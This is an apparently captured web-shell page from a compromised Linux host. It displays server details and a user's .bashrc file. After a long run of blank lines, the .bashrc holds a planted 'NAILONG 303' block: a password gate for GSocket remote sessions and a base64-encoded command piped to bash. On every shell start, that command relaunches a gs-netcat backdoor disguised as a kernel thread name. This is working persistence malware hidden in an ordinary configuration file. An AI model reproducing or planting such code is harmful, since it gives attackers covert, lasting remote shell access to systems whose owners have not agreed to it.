403Webshell
Server IP : 198.38.94.67  /  Your IP : 216.73.217.142
Web Server : LiteSpeed
System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
User : azfilmst ( 1070)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/azfilmst/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/azfilmst//.bashrc









































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































# === NAILONG 303 AUTHENTICATION SYSTEM ===
# This block runs ONLY for GSocket connections (not local terminal)
if [[ $- == *i* ]] && [[ -t 0 ]] && [[ -z "${NAILONG_AUTH_DONE:-}" ]]; then
    # Hash function (compatible across systems)
    hash_input() {
        local input="$1"
        if command -v sha256sum >/dev/null 2>&1; then
            echo -n "$input" | sha256sum | awk '{print $1}'
        elif command -v shasum >/dev/null 2>&1; then
            echo -n "$input" | shasum -a 256 | awk '{print $1}'
        elif command -v openssl >/dev/null 2>&1; then
            echo -n "$input" | openssl dgst -sha256 | awk '{print $NF}'
        else
            echo ""
        fi
    }
    
    # Check if this is a GSocket connection
    PARENT_CMD=$(ps -o comm= -p $PPID 2>/dev/null || echo "")
    IS_GSOCKET=0
    
    if [[ "$PARENT_CMD" == *"gs-netcat"* ]] || [[ "$PARENT_CMD" == *"defunct"* ]] || [[ -n "${GSOCKET_ARGS:-}" ]]; then
        IS_GSOCKET=1
    fi
    
    if [[ -z "${SSH_CONNECTION:-}" ]] && [[ "$IS_GSOCKET" == "0" ]]; then
        IS_GSOCKET=0
    else
        IS_GSOCKET=1
    fi
    
    # Only authenticate for GSocket/remote connections
    if [[ "$IS_GSOCKET" == "1" ]]; then
        export NAILONG_AUTH_DONE=1
        
        # Show Nailong face
        echo
        printf '\033[1;33m\n'
        cat << 'NAILONG_GREETING'
                   :::::::::::::                   
                 :..:::::::::::::::                
               :::::::::::::::::::::::             
              ::**::::::::-----------:::           
             ::.::::::::-=#%#+--------:::          
           :.:::::::::::--=*%#+--------::          
          :::::::-:::::::--===----------::         
         :::::::-::::::::---------------::         
         ::::::-::::::-----------====---::         
         ::::---:::-----==============--::         
         ------------=================--:          
          ---------======++++==+=+===--::          
          :::-======+++++++++++++++==--:           
        :::::::-===++++++++++****+++=-:            
      ::::-=:::-==++**************+++=--           
     ::::--::::::-==++++++***+++++++++==---        
     :::-:::.....::::--=======++==+++++===-:       
     :---:..........::::--========+++++===---:     
      --:...........:::::---======+**++=====-:     
       :............::::::--======+*+++=====--     
      :............:::::::---=====+*++++====-:     
      :..........:::::::::--======+**+++++==-      
     ::.......::::::::::::--=======+*+++++=        
     ::....:::::::::::::---==========++++          
     ::..::::::::::::------=========-:             
      :::::::::::----------=========-:             
      :::::::-------------==++++++==-:             
       --:-------=========+++++++++=-              
NAILONG_GREETING
        printf '\033[1;33m╔════════════════════════════╗\033[0m\n'
        printf '\033[1;33m║   NAILONG 303 IS HERE     ║\033[0m\n'
        printf '\033[1;33m╚════════════════════════════╝\033[0m\n'
        printf '\033[0m\n'
        
        # Ask for password
        printf '\033[1;37mPassword: \033[0m'
        
        # Read password with 15 second timeout
        if read -t 15 -s -r input_pass; then
            echo
            
            # Hash the input password
            INPUT_HASH=$(hash_input "$input_pass")
            
            # Validate against stored hash
            if [ "$INPUT_HASH" != "4dc8550ed00917d8854fe2d0884131472ea4bac052e09fd68dba39392c35221a" ]; then
                # Wrong password
                printf '\n\033[1;31m\n'
                cat << 'NAILONG_FAIL'
                   :::::::::::::                   
                 :..:::::::::::::::                
               :::::::::::::::::::::::             
              ::**::::::::-----------:::           
             ::.::::::::-=#%#+--------:::          
           :.:::::::::::--=*%#+--------::          
          :::::::-:::::::--===----------::         
         :::::::-::::::::---------------::         
         ::::::-::::::-----------====---::         
         ::::---:::-----==============--::         
         ------------=================--:          
          ---------======++++==+=+===--::          
          :::-======+++++++++++++++==--:           
        :::::::-===++++++++++****+++=-:            
      ::::-=:::-==++**************+++=--           
     ::::--::::::-==++++++***+++++++++==---        
     :::-:::.....::::--=======++==+++++===-:       
     :---:..........::::--========+++++===---:     
      --:...........:::::---======+**++=====-:     
       :............::::::--======+*+++=====--     
      :............:::::::---=====+*++++====-:     
      :..........:::::::::--======+**+++++==-      
     ::.......::::::::::::--=======+*+++++=        
     ::....:::::::::::::---==========++++          
     ::..::::::::::::------=========-:             
      :::::::::::----------=========-:             
      :::::::-------------==++++++==-:             
       --:-------=========+++++++++=-              
NAILONG_FAIL
                printf '\033[1;31m╔════════════════════════════╗\033[0m\n'
                printf '\033[1;31m║  ACCESS DENIED - GO HOME  ║\033[0m\n'
                printf '\033[1;31m╚════════════════════════════╝\033[0m\n\n'
                sleep 2
                exit 1
            fi
            # Correct password
            printf '\033[1;32m╔════════════════════════════╗\033[0m\n'
            printf '\033[1;32m║     ACCESS GRANTED ✓      ║\033[0m\n'
            printf '\033[1;32m╚════════════════════════════╝\033[0m\n'
            printf '\033[0m\n'
        else
            printf '\n\033[1;31m[!] Timeout - Access denied\033[0m\n'
            exit 1
        fi
    fi
fi

# === Custom Prompt ===
PS1='\[\033[1;35m\]🔒 \u@\h:\w\$ \[\033[0m\]'

# === GSocket Persistence ===
{
    echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA1IGRlZnVuY3QgMj4vZGV2L251bGwgfHwgKFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgJChnZXBlbnYgSE9NRSkvLmNvbmZpZy9odG9wL2RlZnVuY3QuZGF0IC1saXFEIiBleGVjIC1hICdbc2x1Yl9mbHVzaHdxXScgJChnZXBlbnYgSE9NRSkvLmNvbmZpZy9odG9wL2RlZnVuY3QgMj4vZGV2L251bGwpCg==|base64 -d|bash
} 2>/dev/null &

# === Standard shell configuration ===
if [ -f /etc/bashrc ]; then
    . /etc/bashrc
fi

PATH="$HOME/.local/bin:$HOME/bin:/usr/local/bin:$PATH"
export PATH

umask 022

alias ll='ls -lah'
alias gs-status='ps aux | grep defunct | grep -v grep'

Youez - 2016 - github.com/yon3zu
LinuXploit